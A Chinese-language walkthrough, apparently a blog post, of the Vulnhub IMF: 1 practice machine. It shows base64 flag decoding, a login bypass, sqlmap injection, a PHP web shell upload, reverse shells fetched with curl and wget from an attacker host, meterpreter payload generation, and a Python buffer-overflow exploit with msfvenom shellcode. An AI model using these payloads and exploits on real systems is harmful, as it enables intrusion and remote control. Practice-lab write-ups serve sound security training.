Vulnhub-靶机-IMF: 1 | 易学教程

本篇文章仅用于技术交流学习和研究的目的，严禁使用文章中的技术用于非法目的和破坏，否则造成一切后果与发表本文章的作者无关

靶机下载之后使用仅主机模式加载到本地VMware Workstation工作站，需要发现目标靶机的IP地址，可以使用nmap，netdiscover，或者arp之类的工具 arp-scan 例如:sudo arp-scan -I eth1 -l 当然也是可以使用Windows环境下mac地址扫描工具都是可以的，那么本次演示就是arp-scan工具发现

地址:https://www.vulnhub.com/entry/imf-1,162/

nmap -p- -n -sC -sV 192.168.5.145 -o imf.nmap

目录猜解没有猜解出来，看看目标web

有3个选项卡，分别点击3个选项卡网页上发现什么敏感内容，尝试看每个网页的源代码，发现contact.php的源码页面看到第一个flag

flag1{YWxsdGhlZmlsZXM=}

YWxsdGhlZmlsZXM= 根据特征可以猜测是base64进行编码的，这里进行解码看看

解码后的信息如下：

allthefiles

通过搜索页面的等号发现另一个base64编码的信息

解码后结果

yYXRvcg==} 发现解码出来的信息还是类似base64编码，感觉问题很大，不像是base64编码，然后想了想，发现如下信息可能是连贯的

将其拼接起来解码看看 ZmxhZzJ7YVcxbVlXUnRhVzVwYzNSeVlYUnZjZz09fQ==

得出了flag2

flag2{aW1mYWRtaW5pc3RyYXRvcg==} 将aW1mYWRtaW5pc3RyYXRvcg== 解码后得出 imfadministrator

根据上面得到的imfadministrator 放在web上试试看，发现可以访问，显示一个登陆页面

根据目标靶机上的URL，显示的联系人，使用burp进行暴力破解，无果，然后更改密码作为数组为空传给服务端试试

得出falg3的base64编码Y29udGludWVUT2Ntcw== 将其解码得出如下结果：

continueTOcms

得到上述结果的时候显示的页面提供了一个cms页面

访问看看

访问这个cms的结果如下：

初次看到这类带问号的页面，丢了一个单引号过去，发现存在sql注入漏洞

这种情况就直接使用sqlmap进行注入，不过这里得注意了，因为是登陆之后发现的注入点，那么在注入的时候是需要带入登陆成功的cookie，所以我这直接复制保存对应的http请求包使用sqlmap -r参数进行注入

GET /imfadministrator/cms.php?pagename=disavowlist HTTP/1.1
Host: 192.168.5.145
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://192.168.5.145/imfadministrator/cms.php?pagename=home
Cookie: PHPSESSID=tilm340t4jb64ubgal047l74h4
Connection: close

最终我使用了如下测试参数获取了目标信息：

sqlmap -r flag3imfsqlinj.txt --smart --batch -D admin -T pages -C id,pagedata,pagename --dump-all

具体sqlmap使用操作可以看我的公众号或者B站视频都有介绍

根据注入的结果获得图片的路径

http://192.168.5.145/imfadministrator/images/whiteboard.jpg

看到图片上有二维码，拿起手机扫描下二维码，得出 flag4{dXBsb2Fkcjk0Mi5waHA=}

将上面的base64编码进行解码得出结果为：uploadr942.php

然后试着访问http://192.168.5.145/imfadministrator/uploadr942.php 发现居然可以访问

上述是个上传页面，我们尝试上传看看，经过尝试，先上传一个正常的图片使用burp抓包，然后使用如下代码通过burp重放上传成功执行命令的shell

GIF89a
<?php $cmd=$_GET['cmd']; print(`$cmd`); ?>

获得 flag5{YWdlbnRzZXJ2aWNlcw==} 将此编码进行解码得到结果是：agentservices

这里使用反弹shell方式反弹到了本地kali，类似如下操作

使用kali自身php反弹shell脚本
cp /usr/share/webshells/php/php-reverse-shell.php shellbmfx.php
将上述代码监听的本地IP地址改为kali的IP地址192.168.5.130 监听端口是8855
当前目录执行php脚本开启简易web服务器
php -S 192.168.5.130:4488
本地kali监听端口
nc -lvnp 8855

curl%20-O%20http://192.168.5.130:4488/shellimf.txt;mv%20shellimf.txt%20shellimf2.php

下载到目标靶机然后访问即可反弹

拿到反弹shell权限，方便操作之后开始根据提示进行搜索

看着这一生像是有代理服务，既然有了目标靶机的权限可以尝试看看，搜索一下

使用命令如下：find / -name agent &>/dev/null

发现关键字agent，找到如下信息：

查看access_codes 发现有3个端口，这意思又是要使用knock进行敲击

使用knock进行敲击

多敲击了几次，然后再使用nmap进行7788端口扫描，因为拿到目标的权限查看网络连接获得开放代理的端口就是7788

这里为了方便使用metasploit玩玩，使用它的端口转发功能玩下，大致操作命令如下：

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.5.130 LPORT=4444 -f elf > bmfximfexp

php -S 192.168.5.130:4488

wget http://192.168.5.130:4488/bmfximfexp
chmod 777 bmfximfexp

下载到目标靶机之后执行

./bmfximfexp

成功通过metasploit反弹

使用metasploit将目标靶机7788端口进行了端口转发到本地

然后可以通过nc的方式或者metasploit的方式将目标靶机的agent文件下载到本地kali下进行分析

nc -l -p 9999 > agent
nc 192.168.1.124 9999 < /usr/local/bin/agent

获取了agent在本地进行分析，这方面我不是太擅长，先放着，需要看分析的可以移步至下列地址观看

https://g0blin.co.uk/imf-vulnhub-writeup/

https://habr.com/en/post/318814/

https://acebombersecurity.wordpress.com/2016/11/06/imf-1-walkthrough-vulnhub/

通过生成shellcode 代码

msfvenom -p linux/x86/shell_reverse_tcp LHOST=192.168.5.130 LPORT=8877 -f python -b "\x00\x0a\x0d"

kali@kali:~/Downloads/imf$ msfvenom -p linux/x86/shell_reverse_tcp LHOST=192.168.5.130 LPORT=8877 -f python -b "\x00\x0a\x0d"
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: x86 from the payload
Found 11 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 95 (iteration=0)
x86/shikata_ga_nai chosen with final size 95
Payload size: 95 bytes
Final size of python file: 479 bytes
buf =  b""
buf += b"\xb8\x55\xf0\x23\x37\xda\xd3\xd9\x74\x24\xf4\x5a\x2b"
buf += b"\xc9\xb1\x12\x83\xea\xfc\x31\x42\x0e\x03\x17\xfe\xc1"
buf += b"\xc2\xa6\x25\xf2\xce\x9b\x9a\xae\x7a\x19\x94\xb0\xcb"
buf += b"\x7b\x6b\xb2\xbf\xda\xc3\x8c\x72\x5c\x6a\x8a\x75\x34"
buf += b"\xad\xc4\x83\x46\x45\x17\x8c\x64\x3b\x9e\x6d\xd8\x25"
buf += b"\xf1\x3c\x4b\x19\xf2\x37\x8a\x90\x75\x15\x24\x45\x59"
buf += b"\xe9\xdc\xf1\x8a\x22\x7e\x6b\x5c\xdf\x2c\x38\xd7\xc1"
buf += b"\x60\xb5\x2a\x81"

对应写好的Python利用代码如下：

这里地址需要更改为实际情况的地址，因为我这里使用了端口转发的方式将目标靶机的端口转发到本地，所以是写的本地地址

import socket
client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
client.connect(('localhost', 7788))
client.recv(512)
client.send("48093572\n")
client.recv(512)
client.send("3\n")
client.recv(512)

# shellcode from msfvenom
buf =  b""
buf += b"\xb8\x55\xf0\x23\x37\xda\xd3\xd9\x74\x24\xf4\x5a\x2b"
buf += b"\xc9\xb1\x12\x83\xea\xfc\x31\x42\x0e\x03\x17\xfe\xc1"
buf += b"\xc2\xa6\x25\xf2\xce\x9b\x9a\xae\x7a\x19\x94\xb0\xcb"
buf += b"\x7b\x6b\xb2\xbf\xda\xc3\x8c\x72\x5c\x6a\x8a\x75\x34"
buf += b"\xad\xc4\x83\x46\x45\x17\x8c\x64\x3b\x9e\x6d\xd8\x25"
buf += b"\xf1\x3c\x4b\x19\xf2\x37\x8a\x90\x75\x15\x24\x45\x59"
buf += b"\xe9\xdc\xf1\x8a\x22\x7e\x6b\x5c\xdf\x2c\x38\xd7\xc1"
buf += b"\x60\xb5\x2a\x81"

# padding
buf += "A" * (168 - len(buf))

# call eax gadget
buf += "\x63\x85\x04\x08\n"
client.send(buf)